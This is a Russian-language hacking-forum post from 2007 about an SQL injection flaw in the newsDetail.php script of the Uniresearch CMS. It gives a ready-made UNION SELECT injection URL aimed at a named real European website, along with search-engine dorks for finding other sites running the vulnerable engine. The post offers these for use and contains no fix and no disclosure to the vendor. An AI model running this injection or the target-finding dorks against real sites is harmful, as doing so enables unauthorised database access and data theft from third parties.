powered by Uniresearch © 2007 (SQL-INJ)

Discussion in 'Веб-уязвимости' started by Scipio, 9 Nov 2007.

  1. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    На этом двиге работают в основном европейские сайты, много сайтов в зоне eu

    уязвим скрипт newsDetail.php находится обычно
    http://host/site/en/newsDetail.php

    уязвимую версию определить не удалось, но на офф сайте я так понял ранняя версия и этому сплойту не поддается, хотя незнаю точно...

    а вот собственно и сплойт c примером сайта на уязвимом движке:

    Code:
    http://www.pisa-project.eu/site/en/newsDetail.php?nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
    Дорк: powered by Uniresearch
    inurl:newsDetail.php

    вобщем ковыряю дальше, если что еще найду отпишусь в этом топике
     
    #1 Scipio, 9 Nov 2007
    Last edited: 9 Nov 2007
    1 person likes this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.